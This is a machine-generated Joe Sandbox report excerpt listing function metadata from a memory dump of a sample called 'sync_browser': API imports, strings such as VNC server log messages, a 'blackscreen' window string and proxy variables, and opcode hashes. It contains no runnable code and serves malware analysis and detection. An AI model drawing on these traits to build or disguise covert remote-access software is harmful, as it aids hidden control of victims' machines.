                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$MetricsSystem$Long$Load$AddressAdjustClassCreateCursorIconLibraryObjectProcRectRegisterShowStock
                                                                                          • String ID: 0$P$SetLayeredWindowAttributes$blackscreen$user32
                                                                                          • API String ID: 1337014749-2363801694
                                                                                          • Opcode ID: c8f613f4f1137cd039f0d77ff0fdd36da7c317fdbced729bc12fff3d257e6be4
                                                                                          • Instruction ID: e826080050e2f06d2d99ba6df200f405e413c10694def69dfb7cebdf489ffc40
                                                                                          • Opcode Fuzzy Hash: c8f613f4f1137cd039f0d77ff0fdd36da7c317fdbced729bc12fff3d257e6be4
                                                                                          • Instruction Fuzzy Hash: C4712237A18B8286E714CF65F85476AB3A5FB98754F504139EA5E83794DF3CD049CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Delete$CloseHandleObject$CriticalEventSectionThreadfree$FreeLibraryMessagePostReleaseSingleSleepTerminateWait
                                                                                          • String ID: 2$vncdesktop.cpp : Desktop thread running, force close $vncdesktop.cpp : delete ((RGBPixelList) $vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : ~vncDesktop $vncdesktop.cpp : ~vncDesktop Shutdown()$vncdesktop.cpp : ~vncDesktop m_lGridsList.clear$vncdesktop.cpp : ~vncDesktop:: second request to close InitWindowthread
                                                                                          • API String ID: 2560957196-1231019345
                                                                                          • Opcode ID: 7e6fa46451579ae09ecc31f6b970175f6b68a5489a9f202c976d78238e78da90
                                                                                          • Instruction ID: 25d50d91cf832093bc1c4d13eee249bfbfb63203e7d08fe6a9831bb62ebadf85
                                                                                          • Opcode Fuzzy Hash: 7e6fa46451579ae09ecc31f6b970175f6b68a5489a9f202c976d78238e78da90
                                                                                          • Instruction Fuzzy Hash: 9DB1A027A28AC285FB24DF65D8401F96365FFA4B84F444432EA0ED7AA9CF3CE549D310
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DCE1
                                                                                          • GetProcAddress.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DCFD
                                                                                          • EncodePointer.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DD0F
                                                                                          • GetProcAddress.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DD26
                                                                                          • EncodePointer.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DD2F
                                                                                          • GetProcAddress.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DD46
                                                                                          • EncodePointer.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DD4F
                                                                                          • GetProcAddress.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DD66
                                                                                          • EncodePointer.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DD6F
                                                                                          • GetProcAddress.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DD8E
                                                                                          • EncodePointer.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DD97
                                                                                          • DecodePointer.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DDCA
                                                                                          • DecodePointer.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DDDA
                                                                                          • DecodePointer.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DE30
                                                                                          • DecodePointer.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DE51
                                                                                          • DecodePointer.KERNEL32(?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E88DE6B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
                                                                                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                                                          • API String ID: 2643518689-564504941
                                                                                          • Opcode ID: 3f01601e3236801bc7f61e640a5cdc001557def2435a7818b715a9f11b20129c
                                                                                          • Instruction ID: df6ecce0a92e4e4b4d8300b638857f5857bd6f192f7c84a0d713e0390f832102
                                                                                          • Opcode Fuzzy Hash: 3f01601e3236801bc7f61e640a5cdc001557def2435a7818b715a9f11b20129c
                                                                                          • Instruction Fuzzy Hash: 4D51B326E3AB1382FE59DB55B854675A3A8AF79B81F544135FC1E837A0EE3CB44D8300
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteObjectfree$CombineCreateOffsetRect
                                                                                          • String ID:
                                                                                          • API String ID: 960235054-0
                                                                                          • Opcode ID: 224b91042e85a85521578d17d2a23cec9d35e7843f40fe2a103922193ff0c210
                                                                                          • Instruction ID: 644cb527c12bf738231fdeef4c2c2fcec86fe74c9e7cfdabebb69e45dd6069d8
                                                                                          • Opcode Fuzzy Hash: 224b91042e85a85521578d17d2a23cec9d35e7843f40fe2a103922193ff0c210
                                                                                          • Instruction Fuzzy Hash: B2917137B14A428AEB20DF66E4546ADB765FB94B88F408031EE4E97B65DF3CE509C300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _wgetenv$freeinet_ntoa$ErrorFreeHeapLast_errnomalloc
                                                                                          • String ID: HTTP_PROXY$SOCKS4_RESOLVE$SOCKS4_SERVER$SOCKS5_RESOLVE$SOCKS5_SERVER$SOCKS_RESOLVE$SOCKS_SERVER$http://
                                                                                          • API String ID: 3609861302-2295524587
                                                                                          • Opcode ID: 3f40f81f9f9a56da4334a47dd5e2ac96c2d3be7c17f7bfc7589bc4b69e0d4aab
                                                                                          • Instruction ID: 8262f9d82adb954ab1931c23dcf1d418ed87a41778f03aa7dee9c367210464e5
                                                                                          • Opcode Fuzzy Hash: 3f40f81f9f9a56da4334a47dd5e2ac96c2d3be7c17f7bfc7589bc4b69e0d4aab
                                                                                          • Instruction Fuzzy Hash: 1AA18F23F39A8245FE559B64D8502B96298AF74B84F480935FA0DDB7E5EF3CE849C340
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DesktopThread$CurrentObjectOpen$DeleteInformationInputInvalidateRectUser
                                                                                          • String ID: Default$vncdesktop.cpp : Break log$vncdesktop.cpp : Driver option disabled $vncdesktop.cpp : Driver option enabled $vncdesktop.cpp : EnableOptimisedBlits Failed$vncdesktop.cpp : InitBitmap Failed$vncdesktop.cpp : InitDesktop Failed$vncdesktop.cpp : InitDesktop...$vncdesktop.cpp : InitVideo driver Called$vncdesktop.cpp : Removing real Dib buffer and replace by driver communication buffer$vncdesktop.cpp : SetPalette Failed$vncdesktop.cpp : SetPixFormat Failed$vncdesktop.cpp : SetPixShift Failed$vncdesktop.cpp : ThunkBitmapInfo Failed$vncdesktop.cpp : no default desktop
                                                                                          • API String ID: 421987145-2663527212
                                                                                          • Opcode ID: 708c932f2a283d5bbc71d608cba7ab1ab0c10d4bb7afa53f10560fd6fcd4028b
                                                                                          • Instruction ID: d14437757260ec738ddbbdafc346639eb57acd28184a2f417d2835addbdc7f20
                                                                                          • Opcode Fuzzy Hash: 708c932f2a283d5bbc71d608cba7ab1ab0c10d4bb7afa53f10560fd6fcd4028b
                                                                                          • Instruction Fuzzy Hash: 3CA16937A28A8791EB54DF64E4442F96365EFA4B08F944032E90ECB695DF3CE54DC340
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Free$Globalswscanf$Library$AddressByteCharLoadMultiProcWide
                                                                                          • String ID: 443$P$WinHttpGetIEProxyConfigForCurrentUser$http=$https=$winhttp.dll
                                                                                          • API String ID: 3955186772-955988753
                                                                                          • Opcode ID: f80e017f8dfc52864f10a9d1c006d943c54cd3b71a26042b83a3869f240b4edf
                                                                                          • Instruction ID: dc805fd024677c49ee0864c534ce52885d7f15d4b4b678565d5a4444c8e7f796
                                                                                          • Opcode Fuzzy Hash: f80e017f8dfc52864f10a9d1c006d943c54cd3b71a26042b83a3869f240b4edf
                                                                                          • Instruction Fuzzy Hash: BFB1D123B2CA8285EB10CB64E4803B9A7A9EF65794F544235FA5D87AE5DF7CD10EC300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _errno_invalid_parameter_noinfo_wsopen_s
                                                                                          • String ID: $ $ $ $ $=$UNICODE$UTF-16LE$UTF-8$a$ccs$r$w
                                                                                          • API String ID: 2053332431-1561892669
                                                                                          • Opcode ID: 35e5734d2bed330ea71c417f92d73fedc9b5434ee0112678046c42af1f03098b
                                                                                          • Instruction ID: 2977e13e0e442994f402b45ba0e4ef309ae72d2cf7d9dfeeca79654d0172467c
                                                                                          • Opcode Fuzzy Hash: 35e5734d2bed330ea71c417f92d73fedc9b5434ee0112678046c42af1f03098b
                                                                                          • Instruction Fuzzy Hash: 4071C2A3E3C20645FB754B65AA08739DAC16F31744F985032FE4ECE5D6DE3CE9488601
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Item$MessageSend$_snprintf$InfoScrollText
                                                                                          • String ID: <%s>: $MS Sans Serif
                                                                                          • API String ID: 1140286628-959951747
                                                                                          • Opcode ID: c7a658c0cd68b9c919c6da95f173c1f64cd529a423dcd2b2ccdca4d864df1cc5
                                                                                          • Instruction ID: 2a00b9ff5313f01d6609ff8a4bf3f26949d676350dc1870e6c579952204b3e0a
                                                                                          • Opcode Fuzzy Hash: c7a658c0cd68b9c919c6da95f173c1f64cd529a423dcd2b2ccdca4d864df1cc5
                                                                                          • Instruction Fuzzy Hash: BC919167F24A5286F710CF65E8016A973A0FBA8B98F104135EE4D97B68DF3CD599C300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: freeinet_ntoa$_errnogetpeernamegetsockname$ErrorFreeHeapLast_invalid_parameter_noinfomalloc
                                                                                          • String ID: <unavailable>$Local loop-back connections are disabled.$vncclient.cpp : loopback connection attempted - client accepted$vncclient.cpp : loopback connection attempted - client rejected
                                                                                          • API String ID: 3199031719-36275550
                                                                                          • Opcode ID: 09f765770764a639719d3cf357c971adc31c53d60d100ab1d863cd32f48191e7
                                                                                          • Instruction ID: 1ba5e74bfc41c6a344ba6b0c1fb3fe382480b2378bd7279c3e9894a32023ad7a
                                                                                          • Opcode Fuzzy Hash: 09f765770764a639719d3cf357c971adc31c53d60d100ab1d863cd32f48191e7
                                                                                          • Instruction Fuzzy Hash: C7519023B28B4286EB95DF65E8442B9A3A4FF98B84F440135FA4E87765DF3CE549C700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 2315031519-0
                                                                                          • Opcode ID: 2cd480b998b965cc6955ada75f3ee5f47b1b2dcf7e54efe20603cb8eba4e3483
                                                                                          • Instruction ID: 2e36c95cb5b08ac319e25aa2b04452fd595caf22bdbc0baed421ec398b65cd82
                                                                                          • Opcode Fuzzy Hash: 2cd480b998b965cc6955ada75f3ee5f47b1b2dcf7e54efe20603cb8eba4e3483
                                                                                          • Instruction Fuzzy Hash: 62B16D33A2865286E7649F55E54013EF7A0FBA4B50F504136FB9D83A94EF7CE468CB10
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Desktop$Thread$CloseCurrentErrorInformationInputLastObjectOpenUser
                                                                                          • String ID: vncservice.cpp : !GetUserObjectInformation(inputdesktop$vncservice.cpp : !GetUserObjectInformation(threaddesktop$vncservice.cpp : OpenInputDesktop %i I$vncservice.cpp : OpenInputDesktop II$vncservice.cpp : failed to close input desktop$vncservice.cpp : threadname, inputname differ
                                                                                          • API String ID: 55935355-432259686
                                                                                          • Opcode ID: 1e6938374f11850d6f65cb4abe64859311d8d6483033998e6a50ab09662977c7
                                                                                          • Instruction ID: 5ae7b1290d6f5bed69bb96ecc77ef3a3445e106ad1d72cd4f57610ef67d12e16
                                                                                          • Opcode Fuzzy Hash: 1e6938374f11850d6f65cb4abe64859311d8d6483033998e6a50ab09662977c7
                                                                                          • Instruction Fuzzy Hash: 83518163E2CB8395FB10DB65A8481B9A3A9AFB4744F504172F94EC66A4EF3CE44DC700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
